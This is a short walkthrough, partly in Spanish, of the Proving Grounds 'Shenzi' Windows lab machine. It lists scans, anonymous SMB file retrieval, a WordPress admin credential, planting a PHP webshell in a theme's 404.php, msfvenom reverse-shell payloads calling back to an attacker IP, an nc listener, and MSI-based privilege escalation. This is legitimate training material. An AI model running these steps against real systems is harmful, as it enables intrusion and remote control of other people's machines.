Shenzi

Shenzi


ProvingGrounds Windows

nmap -A -p- -oA shenzi 192.168.234.55 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA shenzi 192.168.234.55

nmap -sU -O -p- -oA shenzi-udp 192.168.234.55

nikto -h 192.168.234.55:80

ssh_command.

ssh_command.

whatweb 192.168.234.55

ssh_command.

smbclient //192.168.234.55/Shenzi -N

recurse

prompt off

mget *

ssh_command.

cat password.txt

ssh_command.

http://192.168.234.55/shenzi/

ssh_command.

http://192.168.234.55/shenzi/wp-admin/ admin:FeltHeadwallWight357

ssh_command.

Nos dirigimos a Appearance > Theme editor y modificamos el archivo 404.php

https://github.com/WhiteWinterWolf/wwwolf-php-webshell/blob/master/webshell.php

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.234 LPORT=445 -f exe > shenzi_reverse.exe

ssh_command.

Subimos el archivo y le damos click en execute

ssh_command.

Podemos ver que se pueden crear archivos msi para en el sistema despues de correr winPEASany.exe

ssh_command.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.234 LPORT=445 -f msi > privesc.msi

ssh_command.

privesc.msi

nc -lvnp 445

ssh_command.

© 2025 Cu3rv0x